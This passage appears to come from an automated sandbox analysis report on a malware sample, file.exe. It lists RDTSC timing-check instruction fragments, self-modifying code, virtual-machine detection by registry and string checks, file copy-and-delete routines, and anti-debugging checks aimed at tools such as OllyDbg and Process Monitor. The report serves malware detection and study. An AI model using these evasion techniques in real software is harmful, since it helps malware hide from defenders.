                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F923F0 second address: F923FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F923FA second address: F92411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92411 second address: F92417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9257A second address: F9257F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9257F second address: F92597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F2AD9523876h 0x00000012 jng 00007F2AD9523876h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92597 second address: F9259B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91592 second address: F91596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91596 second address: F9159C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9935D second address: F9936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9936A second address: F9936E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9936E second address: F9937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AD9523876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99018 second address: F99032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 jg 00007F2AD900F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C153 second address: F9C158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C158 second address: F9C171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F5A3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C171 second address: F9C18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AD9523876h 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007F2AD9523876h 0x00000012 jnc 00007F2AD9523876h 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA871C second address: FA8732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F5A2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8732 second address: FA8736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA82C4 second address: FA82C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC732 second address: FAC738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC738 second address: FAC73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAC73C second address: FAC744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFE8D second address: FAFE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D5E second address: FC4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2AD9523876h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D6E second address: FC4D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D74 second address: FC4D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4EDB second address: FC4EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2AD900F5A9h 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC533C second address: FC5342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5342 second address: FC5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F59Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5352 second address: FC5357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5357 second address: FC536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2AD900F596h 0x0000000a jmp 00007F2AD900F59Ah 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC57D3 second address: FC57D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC61F0 second address: FC61F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC61F5 second address: FC6214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2AD9523876h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F2AD952387Eh 0x00000017 jo 00007F2AD9523876h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6214 second address: FC621A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9883 second address: FC9894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9894 second address: FC98BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Eh 0x00000007 jne 00007F2AD900F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F2AD900F598h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9792 second address: FD9798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9798 second address: FD97A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD97A1 second address: FD97B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jp 00007F2AD9523876h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD97B2 second address: FD97BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AD900F596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DA6 second address: FD6DD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F2AD9523886h 0x00000010 jmp 00007F2AD952387Eh 0x00000015 push eax 0x00000016 pop eax 0x00000017 push esi 0x00000018 jbe 00007F2AD9523876h 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DD2 second address: FD6DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6DD8 second address: FD6DDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8C9B second address: FE8CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2AD900F596h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8CA9 second address: FE8CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8CAD second address: FE8CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD900F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89CB second address: FE89DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F2AD952387Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89DD second address: FE89ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE89ED second address: FE8A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F2AD9523876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F2AD9523876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7B96 second address: FF7BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F2AD900F5A5h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7BBB second address: FF7BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EB0 second address: FF7EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7EB7 second address: FF7ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD952387Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8022 second address: FF8026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8838 second address: FF883C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF883C second address: FF8846 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA03B second address: FFA049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD9523876h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB643 second address: FFB647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5DD second address: FFF5EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F2AD9523888h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5EF second address: FFF5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF5F3 second address: FFF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF90B second address: FFF926 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2AD900F59Dh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFBE9 second address: FFFC10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2AD952387Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2AD9523880h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100176E second address: 1001790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007F2AD900F5B1h 0x0000000b jmp 00007F2AD900F5A5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001790 second address: 1001798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001798 second address: 10017A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100127F second address: 1001283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250331 second address: 5250337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250337 second address: 525034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ecx, 2B21D42Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov bx, cx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525034C second address: 52503AF instructions: 0x00000000 rdtsc 0x00000002 mov ch, CDh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F2AD900F59Fh 0x0000000c sbb cx, 1F6Eh 0x00000011 jmp 00007F2AD900F5A9h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007F2AD900F5A1h 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 mov cx, D983h 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop edi 0x00000029 popad 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e movzx eax, di 0x00000031 popad 0x00000032 pop ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503AF second address: 52503B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52503B3 second address: 52503B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250434 second address: 5250439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5250439 second address: 525043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 525043F second address: 5250443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1CC88 second address: F1CC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1CC8C second address: F1CCC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2AD9523887h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D618C8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D61846 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F2198D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F9E888 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0F68A FindFirstFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B01160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2102191694.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001255000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102191694.0000000001249000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102191694.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareM
                Source: file.exe, 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B045C0 VirtualProtect ?,00000004,00000100,00000000
